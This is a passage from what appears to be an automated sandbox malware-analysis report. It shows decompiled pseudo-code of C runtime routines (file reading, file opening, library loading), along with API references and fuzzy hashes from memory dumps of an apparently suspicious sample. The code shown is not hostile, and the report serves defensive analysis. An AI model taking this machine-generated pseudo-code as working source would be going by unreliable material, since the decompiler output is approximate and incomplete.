				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E00406609(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E004065F6( *_t137))) = 9;
						L60:
						_t139 = E00405C88();
						goto L61;
					}
					__eflags = _t198 -  *0x417358; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x417158 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E00406609(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E004065F6(__eflags))) = 0x16;
								E00405C88();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E004069B7(_t154);
								E00405BB5(0);
								E00405BB5(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E00409BFF(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x417158 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x417158 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t57 = _t143 + 0x2a; // 0x10c483c2
										_t180 =  *((intOrPtr*)(_v20 + _t57));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x417158 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t74 =  *((intOrPtr*)(0x417158 + _v12 * 4)) + 0x2b; // 0x8310c483
													_t185 =  *((intOrPtr*)(_v20 + _t74));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x417158 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t91 =  *((intOrPtr*)(0x417158 + _v12 * 4)) + 0x2c; // 0xf88310c4
																_t190 =  *((intOrPtr*)(_v20 + _t91));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x417158 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E0040B0D2(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0); // executed
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E0040661C(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E004065F6(__eflags))) = 9;
											 *(E00406609(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x417158 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E00409306();
												} else {
													_t170 = E00408FD3();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E0040904E(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x417158 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E004065F6(__eflags))) = 0xc;
									 *(E00406609(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E00405BB5(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x417158 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E00406609(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E004065F6(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E00406609(_t246)) =  *_t197 & 0x00000000;
					_t139 = E004065F6(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7962fd873c812c42c883a21e43ce0c8562e71b57de632454e07f1051821707c
Instruction ID: f4fb29cc2bc759040289b09a43810d9a49ae99a5ecc633e1fd25063e55365582
Opcode Fuzzy Hash: e7962fd873c812c42c883a21e43ce0c8562e71b57de632454e07f1051821707c
Instruction Fuzzy Hash: D0C12770904245AFDF15DFA9CA80BAE7BB1AF49304F04417EE945B73D2CB789901CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB9D Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E0040BB9D(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				signed int* _t186;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;
				signed int _t289;

				_t263 = E0040C01D(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				_t288 = _v36 - _t264;
				if(_v36 != _t264) {
					_t114 = E004081AB(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(__eflags != 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t122 = E0040BF88(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0040834F(_t196, _t253,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x417158 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E0040C241(_t189, 0);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x417158 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x417158 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E0040BF88();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x417158 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E0040661C(GetLastError());
											 *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E004082BE( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E0040C197(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E0040CCBB(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E0040661C(_t271);
							 *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(__eflags == 0) {
								 *((intOrPtr*)(E004065F6(__eflags))) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x417158 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0040661C(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E0040BF88();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00406609(__eflags)) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E004065F6(__eflags))) = 0x18;
						goto L2;
					}
				} else {
					_t186 = E00406609(_t288);
					 *_t186 =  *_t186 & 0x00000000;
					_t289 =  *_t186;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E004065F6(_t289)));
				}
			}

APIs

Part of subcall function 0040BF88: CreateFileW.KERNELBASE(00000000,00000000,?,0040BC46,?,?,00000000), ref: 0040BFA5

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BCB1
__dosmaperr.LIBCMT ref: 0040BCB8
GetFileType.KERNELBASE ref: 0040BCC4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BCCE
__dosmaperr.LIBCMT ref: 0040BCD7
CloseHandle.KERNEL32(00000000), ref: 0040BCF7
CloseHandle.KERNEL32(00000000), ref: 0040BE44
GetLastError.KERNEL32 ref: 0040BE76
__dosmaperr.LIBCMT ref: 0040BE7D

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 45629e90775f591bafbeb9ee62869eb8d2f91baf2a7f4dc583b7b4e1073450fb
Instruction ID: cfb52e5c3737196cb13edf7891f30d5e8dac6b504468cfecf0e5fd7ca7dd3ec8
Opcode Fuzzy Hash: 45629e90775f591bafbeb9ee62869eb8d2f91baf2a7f4dc583b7b4e1073450fb
Instruction Fuzzy Hash: EEA12332A041449FCF199F68DC41BAE3BA0EF46324F18416EE811BB3D1DB399812CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 004049ED Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004049ED(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t13;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x416f28 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x40f588 + _t22 * 4);
						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
						_t32 = _t13;
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00406CEF(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00406CEF(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

Strings

api-ms-, xrefs: 00404A44
ext-ms-, xrefs: 00404A58

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: b6220ee0a9f134539174d2808857bd9bdcb20b393848666b1808fb3e004fd086
Instruction ID: d11d37cf1a039867f00753cdb3131f2debf15eb93fd35a329ae7531e128b8952
Opcode Fuzzy Hash: b6220ee0a9f134539174d2808857bd9bdcb20b393848666b1808fb3e004fd086
Instruction Fuzzy Hash: 6E2108B1B85215A7C7318BA49C40E6B37689B80764F250137EE16B73D1D738ED008DEC

Uniqueness

Uniqueness Score: -1.00%

Function 0040580D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040580D(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t39;
				signed int _t44;
				char _t48;
				char _t51;
				char _t58;
				signed int _t64;
				void* _t75;
				void* _t80;
				signed int _t85;

				_t78 = __edx;
				_push(_a16);
				_push(_a12);
				L0040576D(__ebx, __edx, __edi, __esi, __eflags);
				_t39 = E00405697(__eflags, _a4);
				_v16 = _t39;
				if(_t39 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t80 = E004069B7(0x220);
					_t64 = __ebx | 0xffffffff;
					__eflags = _t80;
					if(__eflags == 0) {
						L5:
						_t85 = _t64;
					} else {
						_t80 = memcpy(_t80,  *(_a12 + 0x48), 0x88 << 2);
						 *_t80 =  *_t80 & 0x00000000; // executed
						_t44 = E004054A4(_t78, __eflags, _v16, _t80); // executed
						_t85 = _t44;
						__eflags = _t85 - _t64;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E004026C6();
							}
							asm("lock xadd [eax], ebx");
							_t66 = _t64 == 1;
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								_t58 = _a12;
								__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x416070;
								if( *((intOrPtr*)(_t58 + 0x48)) != 0x416070) {
									E00405BB5( *((intOrPtr*)(_t58 + 0x48)));
								}
							}
							 *_t80 = 1;
							_t75 = _t80;
							_t80 = 0;
							 *(_a12 + 0x48) = _t75;
							_t48 = _a12;
							__eflags =  *(_t48 + 0x350) & 0x00000002;
							if(( *(_t48 + 0x350) & 0x00000002) == 0) {
								__eflags =  *0x416760 & 0x00000001;
								if(__eflags == 0) {
									_v24 =  &_a12;
									_v20 =  &_a16;
									_t51 = 5;
									_v16 = _t51;
									_v12 = _t51;
									_push( &_v16);
									_push( &_v24);
									_push( &_v12);
									E00405B68(_t66, 0, _t85, __eflags);
									__eflags = _a8;
									if(_a8 != 0) {
										 *0x41664c =  *_a16;
									}
								}
							}
						} else {
							 *((intOrPtr*)(E004065F6(__eflags))) = 0x16;
							goto L5;
						}
					}
					E00405BB5(_t80);
					return _t85;
				} else {
					return 0;
				}
			}

APIs

Part of subcall function 00405697: GetOEMCP.KERNEL32(00000000,00405828,0040A93B,00000000,?,?,00000000,?,0040A93B), ref: 004056C2

_free.LIBCMT ref: 00405885

Strings

p`A, xrefs: 004058AD
x-&, xrefs: 0040591C
p`A, xrefs: 004057C1

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: _free
String ID: p`A$p`A$x-&
API String ID: 269201875-4128107676
Opcode ID: 02d44d9cf6e9cd66804d7e475b15fb19ef90afa2a6ed203f9cc2e638560ba592
Instruction ID: ea908fc2568cb6fc0554f2d5d4afde984d485e60a8e966f3251c86de008d5ace
Opcode Fuzzy Hash: 02d44d9cf6e9cd66804d7e475b15fb19ef90afa2a6ed203f9cc2e638560ba592
Instruction Fuzzy Hash: 8E31BF72800649AFDF11EF69C840A9B77B4EF40318F15807AEC11AB2E1E7799D50CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00409FCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409FCC(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800); // executed
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00406CEF(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x00409fd9
0x00409fe1
0x0040a016
0x00409fe3
0x00409fec
0x00000000
0x0040a013
0x0040a012
0x0040a012

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,0040A068,00000000,?,00416F08,?,?,?,00409F9F,00000004,InitializeCriticalSectionEx,00410168,00410170), ref: 00409FD9
GetLastError.KERNEL32(?,0040A068,00000000,?,00416F08,?,?,?,00409F9F,00000004,InitializeCriticalSectionEx,00410168,00410170,00000000,?,004043D0), ref: 00409FE3
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040A00B

Strings

api-ms-, xrefs: 00409FF0

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 330103864292c38523944cc39d1b8cbd238b6e507625830c5bac9fc5190fb34d
Instruction ID: d7bd6bb98b8eac7eacc4a937879fcff55edfd1e4df5093e885237fb967068a59
Opcode Fuzzy Hash: 330103864292c38523944cc39d1b8cbd238b6e507625830c5bac9fc5190fb34d
Instruction Fuzzy Hash: 94E0123034430CB6EB201F91EC0AB993A589B90B45F104036F91CBC1E1D775E960954D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A228 Relevance: 4.7, APIs: 3, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E0040A228(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				void* _t53;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x416010; // 0x34f38f42
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E0040C650(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E00406E9A(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E00401C35(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E00406D77(_t72);
							_t46 = _t95;
							goto L39;
						}
